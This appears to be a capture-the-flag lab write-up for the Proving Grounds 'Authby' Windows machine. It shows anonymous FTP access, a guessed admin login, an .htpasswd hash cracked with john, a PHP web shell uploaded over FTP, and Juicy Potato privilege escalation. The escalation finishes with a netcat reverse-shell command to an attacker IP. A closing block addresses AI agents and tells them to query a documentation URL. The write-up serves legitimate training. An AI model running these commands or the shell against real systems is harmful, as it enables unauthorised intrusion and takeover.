# Authby ## Recon (Enumeration) ### Nmap ``` nmap 192.168.212.46 -sV -sC --min-rate 3000 -p- -Pn Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-25 00:22 EST Nmap scan report for 192.168.212.46 Host is up (0.042s latency). Not shown: 65531 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp zFTPServer 6.0 build 2011-10-17 | ftp-anon: Anonymous FTP login allowed (FTP code 230) | total 9680 | ---------- 1 root root 5610496 Oct 18 2011 zFTPServer.exe | ---------- 1 root root 25 Feb 10 2011 UninstallService.bat | ---------- 1 root root 4284928 Oct 18 2011 Uninstall.exe | ---------- 1 root root 17 Aug 13 2011 StopService.bat | ---------- 1 root root 18 Aug 13 2011 StartService.bat | ---------- 1 root root 8736 Nov 09 2011 Settings.ini | dr-xr-xr-x 1 root root 512 Nov 25 11:43 log | ---------- 1 root root 2275 Aug 09 2011 LICENSE.htm | ---------- 1 root root 23 Feb 10 2011 InstallService.bat | dr-xr-xr-x 1 root root 512 Nov 08 2011 extensions | dr-xr-xr-x 1 root root 512 Nov 08 2011 certificates |_dr-xr-xr-x 1 root root 512 Jan 23 2023 accounts 242/tcp open http Apache httpd 2.2.21 ((Win32) PHP/5.3.8) |_http-server-header: Apache/2.2.21 (Win32) PHP/5.3.8 | http-auth: | HTTP/1.1 401 Authorization Required\x0D |_ Basic realm=Qui e nuce nuculeum esse volt, frangit nucem! |_http-title: 401 Authorization Required 3145/tcp open zftp-admin zFTPServer admin 3389/tcp open ssl/ms-wbt-server? | ssl-cert: Subject: commonName=LIVDA | Not valid before: 2023-01-22T09:37:27 |_Not valid after: 2023-07-24T09:37:27 | rdp-ntlm-info: | Target_Name: LIVDA | NetBIOS_Domain_Name: LIVDA | NetBIOS_Computer_Name: LIVDA | DNS_Domain_Name: LIVDA | DNS_Computer_Name: LIVDA | Product_Version: 6.0.6001 |_ System_Time: 2023-11-25T05:23:53+00:00 |_ssl-date: 2023-11-25T05:23:58+00:00; 0s from scanner time. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows ``` ### FTP ``` ftp 192.168.246.46 21 Connected to 192.168.246.46. 220 zFTPServer v6.0, build 2011-10-17 14:25 ready. Name (192.168.246.46:g0): anonymous 331 User name received, need password. Password: 230 User logged in, proceed. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 229 Entering Extended Passive Mode (|||2048|) 150 Opening connection for /bin/ls. total 9680 ---------- 1 root root 5610496 Oct 18 2011 zFTPServer.exe ---------- 1 root root 25 Feb 10 2011 UninstallService.bat ---------- 1 root root 4284928 Oct 18 2011 Uninstall.exe ---------- 1 root root 17 Aug 13 2011 StopService.bat ---------- 1 root root 18 Aug 13 2011 StartService.bat ---------- 1 root root 8736 Nov 09 2011 Settings.ini dr-xr-xr-x 1 root root 512 Nov 09 13:24 log ---------- 1 root root 2275 Aug 09 2011 LICENSE.htm ---------- 1 root root 23 Feb 10 2011 InstallService.bat dr-xr-xr-x 1 root root 512 Nov 08 2011 extensions dr-xr-xr-x 1 root root 512 Nov 08 2011 certificates dr-xr-xr-x 1 root root 512 Jan 23 2023 accounts ``` Found an open FTP server Anonymous creds seem to work. I've also found some interesting users. ``` ftp> cd accounts 250 CWD Command successful. ftp> dir 229 Entering Extended Passive Mode (|||2050|) 150 Opening connection for /bin/ls. total 4 dr-xr-xr-x 1 root root 512 Jan 23 2023 backup ---------- 1 root root 764 Jan 23 2023 acc[Offsec].uac ---------- 1 root root 1032 Nov 09 13:25 acc[anonymous].uac ---------- 1 root root 926 Jan 23 2023 acc[admin].uac 226 Closing data connection. ``` So now we know there is prob `admin` `offsec` and `anonymous` users available. Lets try `admin:admin` to log into ftp! ``` ftp 192.168.246.46 21 Connected to 192.168.246.46. 220 zFTPServer v6.0, build 2011-10-17 14:25 ready. Name (192.168.246.46:g0): admin 331 User name received, need password. Password: 230 User logged in, proceed. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 229 Entering Extended Passive Mode (|||2078|) 150 Opening connection for /bin/ls. total 3 -r--r--r-- 1 root root 76 Nov 08 2011 index.php -r--r--r-- 1 root root 45 Nov 08 2011 .htpasswd -r--r--r-- 1 root root 161 Nov 08 2011 .htaccess 226 Closing data connection. ftp> more .htaccess AuthName "Qui e nuce nuculeum esse volt, frangit nucem!" AuthType Basic AuthUserFile c:\\wamp\www\.htpasswd Require valid-user ftp> ftp> more .ht .htaccess .htpasswd ftp> more .htpasswd offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0 ftp> ls ftp: No control connection for command 226 Closing data connection. ftp> exit ``` Well What do we have here! We're able to login and were able to use some credentials. I was able to run `john` on this has and found the password `elite` ``` john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt Using default input encoding: UTF-8 Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status elite (?) 1g 0:00:00:00 DONE (2023-11-24 22:48) 10.00g/s 253440p/s 253440c/s 253440C/s 191192..260989 Use the "--show" option to display all of the cracked passwords reliably Session completed. ``` Alrighty! Lets move onto Initial access! ### Initial Access You Might have noticed there is a Webserver running at port 242

Basic authentication on Webserver

Lets try our new found credentials here!

Quote to piss you off.

Alrighty. Remember our FTP server? ``` total 3 -r--r--r-- 1 root root 76 Nov 08 2011 index.php -r--r--r-- 1 root root 45 Nov 08 2011 .htpasswd -r--r--r-- 1 root root 161 Nov 08 2011 .htaccess 226 Closing data connection. ``` This is interesting, I know that this webserver is running `Apache` + `php` Maybe we can upload a web shell? ``` ftp 192.168.212.46 21 Connected to 192.168.212.46. 220 zFTPServer v6.0, build 2011-10-17 14:25 ready. Name (192.168.212.46:g0): admin 331 User name received, need password. Password: 230 User logged in, proceed. Remote system type is UNIX. Using binary mode to transfer files. ftp> put dradik2.php local: dradik2.php remote: dradik2.php 229 Entering Extended Passive Mode (|||2063|) 150 File status okay; about to open data connection. 100% |******************************************************************************************************************************************************************************************************************| 7206 70.84 MiB/s 00:00 ETA226 Closing data connection. 7206 bytes sent in 00:00 (285.87 KiB/s) ftp> exit 221 Goodbye. ``` Yes We can!
Look How pretty this web shell is! I was able to retrieve the user flag by navigation to the user account and reading the proof.txt I upgraded my webshell to a reverse shell and started probing the mcahine. I spent wayyy too much time here but this is a Windows Server 2008 R1 with 0 patches applied. ### Privilege Escalation I delved into various potato exploits. Seems like Juicy Potato (x86) was the one that was going to help us escalate privileges. I attempted MS13-053 but to no avail. ``` .\MS13-053.exe -------------------------------------------------- Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit ------------------- taviso () cmpxchg8b com, programmeboy () gmail com --- [+] NtQueryIntervalProfile () 77538AC8 [+] NtQuerySystemInformation () 77538BC8 [?] NtQuerySystemInformation() => \SystemRoot\system32\ntkrnlpa.exe () 8160A000 [+] Discovered a ret instruction at 8160B31E [+] Allocated userspace PATHRECORD () 00860000 [+] ->next @ 00860000 [+] ->prev @ 42424242 [+] ->flags @ 0 [+] Searching for an available stub address... [+] Success, ExploitRecordExit () 0x4065ff40 [+] ->next @ 00000000 [+] ->prev @ 00000000 [+] ->flags @ 1 [+] ExploitRecord () 0xe87020 [+] ->next @ 4065FF40 [+] ->prev @ 8170241C [+] ->flags @ 17 [+] Creating complex bezier path with 86000 [+] Begin CreateRoundRectRgn cycle [+] Allocated 263 HRGN objects [+] Flattening curves... [!] No luck, run exploit again (it can take several attempts) [+] Press any key to exit... C:\wamp\www>.\MS13-053.exe ``` #### JuicyPotato I figured i'd give this a try. ``` C:\wamp\www>.\Juicy.Potato.x86.exe .\Juicy.Potato.x86.exe JuicyPotato v0.1 Mandatory args: -t createprocess call: CreateProcessWithTokenW, CreateProcessAsUser, <*> try both -p : program to launch -l : COM server listen port Optional args: -m : COM server listen address (default 127.0.0.1) -a : command line argument to pass to program (default NULL) -k : RPC server ip address (default 127.0.0.1) -n : RPC server listen port (default 135) -c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097}) -z only test CLSID and print token's user C:\wamp\www>.\Juicy.Potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} .\Juicy.Potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} Testing {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} 1337 COM -> recv failed with error: 10038 ``` Fail. Lets try another CSID The following doc has a lot of handy CSID's. {% embed url="" %} So we find a suitable CSID and test! ``` C:\wamp\www>.\Juicy.Potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {752073A1-23F2-4396-85F0-8FDB879ED0ED} .\Juicy.Potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {752073A1-23F2-4396-85F0-8FDB879ED0ED} Testing {752073A1-23F2-4396-85F0-8FDB879ED0ED} 1337 .... [+] authresult 0 {752073A1-23F2-4396-85F0-8FDB879ED0ED};NT AUTHORITY\SYSTEM [+] CreateProcessWithTokenW OK C:\wamp\www>nc nc 'nc' is not recognized as an internal or external command, operable program or batch file. C:\wamp\www>.\Juicy.Potato.x86.exe -l 1337 -c "{752073A1-23F2-4396-85F0-8FDB879ED0ED}" -p c:\windows\system32\cmd.exe -a "/c c:\wamp\www\nc.exe -e cmd.exe 192.168.45.215 12346" -t * .\Juicy.Potato.x86.exe -l 1337 -c "{752073A1-23F2-4396-85F0-8FDB879ED0ED}" -p c:\windows\system32\cmd.exe -a "/c c:\wamp\www\nc.exe -e cmd.exe 192.168.45.215 12346" -t * Testing {752073A1-23F2-4396-85F0-8FDB879ED0ED} 1337 .... [+] authresult 0 {752073A1-23F2-4396-85F0-8FDB879ED0ED};NT AUTHORITY\SYSTEM [+] CreateProcessWithTokenW OK ``` In the middle I check for nc. Machine didn't have it so I had to upload it and then modify my payload to call for a reverse shell. We catch the shell and we are now nt authority/system! 
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>more proof.txt
more proof.txt
d935e8d5acb71070b29ad5266c11bcb4
GG! ### Helpful Links {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.whitehat.nyc/oscp-proving-grounds/authby.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.